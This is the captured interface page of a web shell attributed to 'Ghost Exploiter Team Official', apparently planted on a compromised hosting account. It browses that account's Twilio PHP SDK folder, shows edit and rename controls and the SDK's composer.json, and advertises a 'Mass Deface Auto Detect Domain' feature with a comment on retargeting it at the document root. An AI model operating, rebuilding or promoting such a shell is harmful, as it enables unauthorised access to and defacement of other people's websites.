webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
.github
--
ren
src
--
ren
CODE_OF_CONDUCT.md
3.175KB
edt
ren
Dockerfile
0.273KB
edt
ren
Dockerfile-dev
0.367KB
edt
ren
PULL_REQUEST_TEMPLATE.md
1.608KB
edt
ren
composer.json
0.828KB
edt
ren
phpdox.xml
0.4KB
edt
ren
sonar-project.properties
0.339KB
edt
ren
{ "name": "twilio/sdk", "type": "library", "description": "A PHP wrapper for Twilio's API", "keywords": ["twilio", "sms", "api"], "homepage": "https://github.com/twilio/twilio-php", "license": "MIT", "authors": [ { "name": "Twilio API Team", "email": "api@twilio.com" } ], "require": { "php": ">=7.1.0" }, "require-dev": { "guzzlehttp/guzzle": "^6.3 || ^7.0", "phpunit/phpunit": ">=7.0 < 10" }, "suggest": { "guzzlehttp/guzzle": "An HTTP client to execute the API requests" }, "autoload": { "psr-4": { "Twilio\\": "src/Twilio/" } }, "autoload-dev": { "psr-4": { "Twilio\\Tests\\": "tests/Twilio/" } }, "config": { "lock": false } }